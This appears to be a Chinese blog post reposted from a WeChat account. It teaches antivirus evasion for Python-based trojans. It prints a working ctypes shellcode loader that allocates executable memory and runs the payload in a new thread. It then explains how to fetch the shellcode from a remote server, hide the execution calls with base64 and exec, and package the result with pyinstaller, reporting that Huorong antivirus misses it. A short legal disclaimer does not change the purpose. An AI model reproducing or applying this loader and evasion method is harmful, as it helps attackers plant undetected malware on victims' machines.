声明:请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。
大家好,X师傅又和大家见面啦,今天为大家带来python分离免杀的思路分享
分离免杀:重要的是分离,无代码落地,无shellcode落地,让杀软查杀无法发现恶意代码和shellcode让杀软无从下手
免杀的代码主要运行在x86平台,因为现在x64平台可兼容x86的程序,所以x86的马子也可以在x64平台运行
基于Python免杀,首先查看shellcode,shellcode使用python的或者C的都可以,其他的就不知道了,没测试,下面以C的shellcode为例子。
import ctypes
shellcode=b"x01xff.....shellcode....."
#32位加载器方法一
rwxpage = ctypes.windll.kernel32.VirtualAlloc(0, len(shellcode), 0x1000, 0x40)
ctypes.windll.kernel32.RtlMoveMemory(rwxpage, ctypes.create_string_buffer(shellcode), len(shellcode))
handle = ctypes.windll.kernel32.CreateThread(0, 0, rwxpage, 0, 0, 0)
ctypes.windll.kernel32.WaitForSingleObject(handle, -1)
测试一下替换shellcode,木马还是能够正常上线的
当然现在也是不免杀的,先其将分离,就是将shellcode和代码放到服务器上让文件去请求shellcode和执行代码
下面我们一步一步来
先将shellcode写入服务器txt文件
然后服务器去请求shellcode
上线成功
但是还是不免杀,因为我们下面执行的命令也是查杀的关键字,所以我们还要把下面的命令做一个混淆,将命令合并成3条,将后两条命令base64编码赋值给变量a,使用Python中的exec运行解码后的变量a,解码后变成两条命令,Python中的exec可以执行多条命令,他是可以分开执行的,当然eval也可以,但是eval只能执行一条命令,所以这里使用exec
Ok上线并且火绒免杀
使用pyinstaller -F -w shell.py打包成exe在x64平台测试一下,发现火绒并没报毒,免杀上线。
站岗小狗为您服务
原文始发于微信公众号(HexaGoners):基于Python分离免杀思路
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论